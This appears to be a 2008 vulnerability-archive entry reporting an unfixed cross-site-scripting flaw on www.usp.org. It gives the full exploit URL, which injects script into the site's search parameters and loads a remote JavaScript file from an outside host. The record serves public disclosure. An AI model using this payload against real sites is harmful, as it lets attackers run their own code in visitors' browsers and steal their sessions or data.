Security researcher gamr, has submitted on 04/09/2008 a cross-site-scripting (XSS) vulnerability affecting www.usp.org, which at the time of submission ranked 224798 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/09/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/09/2008 |
Date published: 24/09/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: gamr |
Domain: www.usp.org |
Category: XSS |
Pagerank: 224798 |
URL: http://www.usp.org/search.html?kw=%3CIMG+%22%22%22%3E%3CSCRIPT%3Eif+%28x+%3D%3D+undefined%29%7B+var+ x%3D1%3B+document.write%28%27%3Cscript+src%3Dhttp%3A%2F%2Fwww.yougotxssed.com%2Fxss2.js+type%3D%22te xt%2Fjavascript%22%3E%3C%5C%2Fscript%3E%27%29%3B+%7D%3C%2FSCRIPT%3E%22%3E&locale=EN&index=all&search =%3CIMG+%22%22%22%3E%3CSCRIPT%3Eif+%28x+%3D%3D+undefined%29%7B+var+x%3D1%3B+document.write%28%27%3Cs cript+src%3Dhttp%3A%2F%2Fwww.yougotxssed.com%2Fxss2.js+type%3D%22text%2Fjavascript%22%3E%3C%5C%2Fscr ipt%3E%27%29%3B+%7D%3C%2FSCRIPT%3E%22%3E&Go.x=0&Go.y=0 |
Click here to view the mirror
|
|
|